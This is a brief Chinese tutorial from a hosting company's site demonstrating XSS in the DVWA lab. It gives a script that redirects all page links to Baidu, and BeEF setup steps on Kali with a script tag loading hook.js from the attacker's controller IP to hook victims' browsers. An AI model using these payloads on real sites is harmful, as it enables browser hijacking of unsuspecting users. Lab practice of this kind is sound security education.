溫馨提示×
您好,登錄后才能下訂單哦!
點擊 登錄注冊 即表示同意《億速云用戶服務條款》
您好,登錄后才能下訂單哦!
這篇文章給大家介紹XSS漏洞的惡意鏈接是怎樣的,內容非常詳細,感興趣的小伙伴們可以參考借鑒,希望對大家能有所幫助。
一、環境:DVWA
二、修改網頁鏈接
1、點擊下面的網址,訪問的是不同的內容
2、通過xss漏洞,修改這些網址都指向百度
window.onload:當窗口加載時,執行匿名函數
<script>
window.onload=function(){
var link=document.getElementsByTagName("a");
for(j=0;j<link.length;j++){
link[j].href="https://www.baidu.com";
}
}
</script>
3、在漏洞處輸入上面代碼,提交
三、生成惡意鏈接(kali攻擊,win7被攻擊)
1、kali啟動beff-xss
2、啟動apache服務:service apache2 start
3、cd /var/www/html
修改index.html
<script src="
http://控制端ip:3000/hook.js"></script>
5、被控端上線。
關于XSS漏洞的惡意鏈接是怎樣的就分享到這里了,希望以上內容可以對大家有一定的幫助,可以學到更多知識。如果覺得文章不錯,可以把它分享出去讓更多的人看到。
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。
